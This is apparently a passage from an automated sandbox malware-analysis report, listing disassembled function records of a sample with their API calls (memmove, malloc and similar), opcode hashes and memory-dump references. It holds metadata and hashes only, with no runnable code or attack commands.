                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$memmove
                                                    • String ID:
                                                    • API String ID: 15630516-0
                                                    • Opcode ID: fd1325f0e36d76d785edad516bb4fe04b7faf966728c9a8081332ed6b559d85a
                                                    • Instruction ID: 6b4a660d66ae36a4d52d8d6d9d7b2cadef71275fbe56cb2c4a506252cfee7e02
                                                    • Opcode Fuzzy Hash: fd1325f0e36d76d785edad516bb4fe04b7faf966728c9a8081332ed6b559d85a
                                                    • Instruction Fuzzy Hash: 6E91A063F65A818AEB40EFA4D4403ACB371EB547A8F814335DE2C26699DF3994A1C360
                                                    APIs
                                                    • memmove.VCRUNTIME140(?,?,00000000,?,?,?,00007FF7738EF41B), ref: 00007FF7738EFB34
                                                      • Part of subcall function 00007FF7738F4108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7738ECF43,?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738F4122
                                                    • memmove.VCRUNTIME140(?,?,00000000,?,?,?,00007FF7738EF41B), ref: 00007FF7738EFB21
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,?,?,00007FF7738EF41B), ref: 00007FF7738EFBCE
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738EFBDB
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                    • String ID:
                                                    • API String ID: 2075926362-0
                                                    • Opcode ID: 9ed46b6f8f75cd7a11fab145833413d8715b3bb7ca78f2fa700ff5e348dbe209
                                                    • Instruction ID: ad3df79d2816cd2fc0415ff3f65fd72d68c171851ab2ad36df6878c336a72a67
                                                    • Opcode Fuzzy Hash: 9ed46b6f8f75cd7a11fab145833413d8715b3bb7ca78f2fa700ff5e348dbe209
                                                    • Instruction Fuzzy Hash: C651C1B3735B8A82DE44EB1594541A9E3A0F798BC4FC48636DE4D1B785DF3DE1A18320
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 345ed9141544bd9e532acaeea0028dac4bd11417d57088c0308dd1692226be08
                                                    • Instruction ID: a0429e277db34103fe18b001f07b83fceeb3ef0ff63fae04688c2a34db8ad4f3
                                                    • Opcode Fuzzy Hash: 345ed9141544bd9e532acaeea0028dac4bd11417d57088c0308dd1692226be08
                                                    • Instruction Fuzzy Hash: 66518233628B8285DB509F28E45036DF3A0FB94B94F904236DA9D937A8EF7DC454C720
                                                    APIs
                                                    • memmove.VCRUNTIME140(?,?,?,00007FF7738F36C9), ref: 00007FF7738F37D3
                                                    • memmove.VCRUNTIME140(?,?,?,00007FF7738F36C9), ref: 00007FF7738F37E6
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7738F36C9), ref: 00007FF7738F384C
                                                      • Part of subcall function 00007FF7738F4108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7738ECF43,?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738F4122
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738F3859
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                    • String ID:
                                                    • API String ID: 2075926362-0
                                                    • Opcode ID: 36798d03f89bd7df17e9e62c4e2c1e0c6d0dca22d1dede475b6040d7aff5e051
                                                    • Instruction ID: 98f5ff4011a7baed51e6bae7af3ed4fd9fe0bb18853097cdaf08da2de82ae8e7
                                                    • Opcode Fuzzy Hash: 36798d03f89bd7df17e9e62c4e2c1e0c6d0dca22d1dede475b6040d7aff5e051
                                                    • Instruction Fuzzy Hash: F441E463739A8785ED54AB26E444279E360AB24BD0F944631DA6D137D1DE7EE0A0C320
                                                    APIs
                                                    • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC8F3
                                                    • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC9B9
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738EC9DD
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: memmove$Concurrency::cancel_current_task
                                                    • String ID:
                                                    • API String ID: 1247048853-0
                                                    • Opcode ID: 78ecd34588d1295b6496e20391519401930434734a3d00d4ba2c8d3a2a4eb0b5
                                                    • Instruction ID: 76dd62bf4d0cdeb5e71d18ac8fbdde51a6b7e0da4ef744350adb64556edcada2
                                                    • Opcode Fuzzy Hash: 78ecd34588d1295b6496e20391519401930434734a3d00d4ba2c8d3a2a4eb0b5
                                                    • Instruction Fuzzy Hash: B531B723B7974245E954BB12A440278D664AF057F4F980730DEBD277D6DE3DE1A18330
                                                    APIs
                                                    • memmove.VCRUNTIME140(?,?,00000000,?,?,00007FF7738F0D50), ref: 00007FF7738F26FB
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,?,00007FF7738F0D50), ref: 00007FF7738F272F
                                                    • memmove.VCRUNTIME140(?,?,00000000,?,?,00007FF7738F0D50), ref: 00007FF7738F2739
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738F2762
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 2016347663-0
                                                    • Opcode ID: 3b99ef85cf43863889d757c9bcf8c4a6a8c7478b69587d46b2c06943d5f6ef65
                                                    • Instruction ID: deef004c814f826e8a3fc78135ae115e7cd4ec3fdf437b499a3896ebecc2b3df
                                                    • Opcode Fuzzy Hash: 3b99ef85cf43863889d757c9bcf8c4a6a8c7478b69587d46b2c06943d5f6ef65
                                                    • Instruction Fuzzy Hash: 1031C367B3974781EE50BB12E5002ADE2A1EB24BD0F980631DA6D1B7D5DE7DE0A18330
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 2016347663-0
                                                    • Opcode ID: 23121f645e64b1a1485694149be1f852b99531ba4ef07daa1f06db3066981d20
                                                    • Instruction ID: 0568d451833ef77a34d1ace36144e5d36e5406b53a6123d06d25aa8400551eb1
                                                    • Opcode Fuzzy Hash: 23121f645e64b1a1485694149be1f852b99531ba4ef07daa1f06db3066981d20
                                                    • Instruction Fuzzy Hash: D6310763B3978290EE50AB12A5003ADE661AB04BD0F984735DEAD177C5DF7EE060C330
                                                    APIs
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738ED342
                                                      • Part of subcall function 00007FF7738F4108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7738ECF43,?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738F4122
                                                    • memmove.VCRUNTIME140 ref: 00007FF7738ED373
                                                    • memmove.VCRUNTIME140 ref: 00007FF7738ED383
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738ED3A6
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                    • String ID:
                                                    • API String ID: 2075926362-0
                                                    • Opcode ID: 40b7fbff180d36dde21ad2ac87eba0bf8e1f86231773ecc8bef76c468d774d32
                                                    • Instruction ID: 61e5b86507ad9251ebd2b5cbc39372ecec5f230225200fe58b81c55f4f0c58e1
                                                    • Opcode Fuzzy Hash: 40b7fbff180d36dde21ad2ac87eba0bf8e1f86231773ecc8bef76c468d774d32
                                                    • Instruction Fuzzy Hash: 0A31C52372964194EA64EB12A4402B9E251AB887B4F9C0731DE7D577D5EF3DE0A9C320
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: memmove$Concurrency::cancel_current_task
                                                    • String ID:
                                                    • API String ID: 1247048853-0
                                                    • Opcode ID: 43086135f500e49417e2b2305c429d523123fbe14cf59deed155151307bdd8b0
                                                    • Instruction ID: 41642f34b3ddc1a1645a040cbc257e698309c65c35ed582c69c1e59d0c00d596
                                                    • Opcode Fuzzy Hash: 43086135f500e49417e2b2305c429d523123fbe14cf59deed155151307bdd8b0
                                                    • Instruction Fuzzy Hash: AC21F9A3E7975644E955FB11A50037CD2549B04BE4FA80731DEAD277C2DE7DA4A28330
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: ByteCharErrorLastMultiWide
                                                    • String ID:
                                                    • API String ID: 203985260-0
                                                    • Opcode ID: c79e89838950335e68161c302d24957cb7b53d237c1007f095858aba05deba80
                                                    • Instruction ID: 99ce6f797929aa94db959e7eb5af21d8c1755e2e90c9fcaa15b4af97cd456b84
                                                    • Opcode Fuzzy Hash: c79e89838950335e68161c302d24957cb7b53d237c1007f095858aba05deba80
                                                    • Instruction Fuzzy Hash: 77213A73A28B8287E3609F11E40431EFAA4F798B94F640234DB8967B54DF7ED8558B20